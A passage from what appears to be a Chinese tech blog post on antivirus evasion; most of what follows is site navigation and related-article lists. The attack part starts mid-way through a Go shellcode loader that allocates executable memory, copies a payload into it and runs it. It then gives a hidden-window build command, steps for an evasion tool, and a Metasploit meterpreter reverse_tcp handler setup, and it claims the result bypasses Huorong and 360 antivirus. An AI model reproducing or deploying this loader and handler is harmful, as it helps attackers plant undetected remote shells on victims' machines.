  addr, _, err := VirtualAlloc.Call(0, uintptr(len(ttyolller)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
  if err != nil && err.Error() != "The operation completed successfully." {
    syscall.Exit(0)
  }
  time.Sleep(3)
  _, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&ttyolller[0])), uintptr(len(ttyolller)))
  if err != nil && err.Error() != "The operation completed successfully." {
    syscall.Exit(0)
  }
  syscall.Syscall(addr, 0, 0,

生成exe文件

go build -ldflags="-H windowsgui" .\main.go

上传到靶机测试下

MSF免杀

640.png

选择windows 模块  2

选择攻击类型  1

选择加密类型 2

选择方式 1


启动msf

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 10.0.0.10
set lport 8888
run

第一种免杀 使用python + go  可以绕过火绒 360直接杀

PS:(网上的师傅操作是可以,大概可能是360版本或者病毒库未更新)

第二种使用的是py的框架 后续也可以转移shell至CS 都可以成功绕过

文章标签:
C语言
Python
Go
Shell
Windows
数据安全/隐私保护
关键词:
Go Python
Python go
轩公子谈技术
目录
相关文章
wljslmz
|
6天前
|
Rust 安全 程序员
异常处理的三国演义:Python、Go、Rust的对比探究
【4月更文挑战第18天】
wljslmz
27 0
异常处理的三国演义:Python、Go、Rust的对比探究
冷冻工厂
|
6天前
|
Rust Java Go
Python is Easy. Go is Simple. Simple != Easy
Python以其易学易用著称,常用于初学者编程和复杂科学计算,但其解释器的复杂性和环境易变性可能导致运行时问题。Go语言则追求简单,语法稳定,编译快速,生成的二进制文件小巧、独立。Go的静态链接特性使其能在不同系统上无缝运行,而Python在数据科学和原型设计上仍具有优势。结合两者,通过Django进行快速原型验证,然后用Go重构业务逻辑和高性能部分,形成了一种有效的开发策略。
冷冻工厂
20 0
桃李春风一杯酒
|
6天前
|
编解码 JavaScript 前端开发
【专栏】介绍了字符串Base64编解码的基本原理和在Java、Python、C++、JavaScript及Go等编程语言中的实现示例
【4月更文挑战第29天】本文介绍了字符串Base64编解码的基本原理和在Java、Python、C++、JavaScript及Go等编程语言中的实现示例。Base64编码将24位二进制数据转换为32位可打印字符,用“=”作填充。文中展示了各语言的编码解码代码,帮助开发者理解并应用于实际项目。
桃李春风一杯酒
24 1
一百减一是零
|
6天前
|
前端开发 Java Go
开发语言详解(python、java、Go(Golong)。。。。)
开发语言详解(python、java、Go(Golong)。。。。)
一百减一是零
68 0
游客rihqhtgkydneq
|
6天前
|
Rust Java Go
Python 和 Go:逐步解析
Python 和 Go 各具特色,能够互补
游客rihqhtgkydneq
21 0
傻啦嘿哟
|
6天前
|
机器学习/深度学习 Go 云计算
Go语言与Python语言的性能比较
Go语言与Python语言的性能比较
傻啦嘿哟
51 1
K8sCat
|
6天前
|
Go 云计算 开发者
2024 Python开发者转型Go开发
随着Go语言在云计算、微服务和高性能网络服务中的流行,Python开发者面临是否转向Go开发的选择。这个决定涉及到多方面的考量,包括语言特性、生态系统、性能需求、学习曲线和职业发展等。本文将深入探讨Python开发者转向Go开发的利弊,分析两种语言在不同场景下的适用性,并提供从Python到Go的过渡策略,旨在为Python开发者提供全面的转型指南。
K8sCat
59 0
2024 Python开发者转型Go开发
小万哥丶
|
6天前
|
Cloud Native Linux Go
Go 编程语言详解:用途、特性、与 Python 和 C++ 的比较
Go是一个跨平台、开源的编程语言 Go可用于创建高性能应用程序 Go是一种快速、静态类型、编译型语言,感觉上像动态类型、解释型语言 Go由Robert Griesemer、Rob Pike和Ken Thompson于2007年在Google开发 Go的语法类似于C ++
小万哥丶
77 0
qq_734449600
|
5月前
|
Go
go defer用法_类似与python_java_finially
go defer用法_类似与python_java_finially
qq_734449600
38 0
qq_734449600
|
5月前
|
Go Python
go cmd 使用 与 结构 说明,go cmd 调用 python
go cmd 使用 与 结构 说明,go cmd 调用 python
qq_734449600
30 0

热门文章

最新文章

  • 1
    《Go 简易速速上手小册》第7章:包管理与模块(2024 最新版)(上)
  • 2
    Sublime Text 3配置Go语言开发环境
  • 3
    《Go 简易速速上手小册》第1章:Go 语言基础(2024 最新版)(上)
  • 4
    使用Go语言和chromedp库下载Instagram图片:简易指南
  • 5
    对象存储OSS产品常见问题之go语言SDK client 和 bucket 并发安全如何解决
  • 6
    Go vs Java:内存管理与垃圾回收机制对比
  • 7
    Rust vs Go:解析两者的独特特性和适用场景
  • 8
    Go vs Java:在大数据处理领域的性能对比
  • 9
    Go语言TCP Socket编程(上)
  • 10
    Go语言TCP Socket编程(下)
  • 1
    请简述Python中的垃圾回收机制。
    15
  • 2
    Python中如何实现二分查找?请提供代码示例。
    26
  • 3
    Python中如何实现列表去重?请提供至少两种方法
    21
  • 4
    Python中的装饰器:概念、用法和实例
    23
  • 5
    Python中的装饰器:概念、用法及实例
    19
  • 6
    使用Python实现图像处理中的边缘检测算法
    100
  • 7
    Python中如何实现字符串反转?请提供至少两种方法。
    26
  • 8
    在Python中,如何创建一个迭代器?
    22
  • 9
    请解释Python中的迭代器和生成器的区别?并分别举例说明。
    21
  • 10
    在Python中,如何使用装饰器重写类的方法?
    293

    • 相关课程

    更多
  • Python Web开发基础
  • Python开发基础入门
  • Python常用数据科学库
  • Python网络爬虫实战
  • Python完全自学手册图文教程
  • Python基础快速入门实战教程

    • 相关电子书

    更多
  • From Python Scikit-Learn to Sc
  • Data Pre-Processing in Python:
  • 双剑合璧-Python和大数据计算平台的结合

    • 相关实验场景

    更多
  • Python新手入门
  • Python入门
  • Python选择及循环结构
  • Python新手入门(Anolis OS)
  • Python网络通信程序典型应用
    • 下一篇
    2024年阿里云免费云服务器及学生云服务器申请教程参考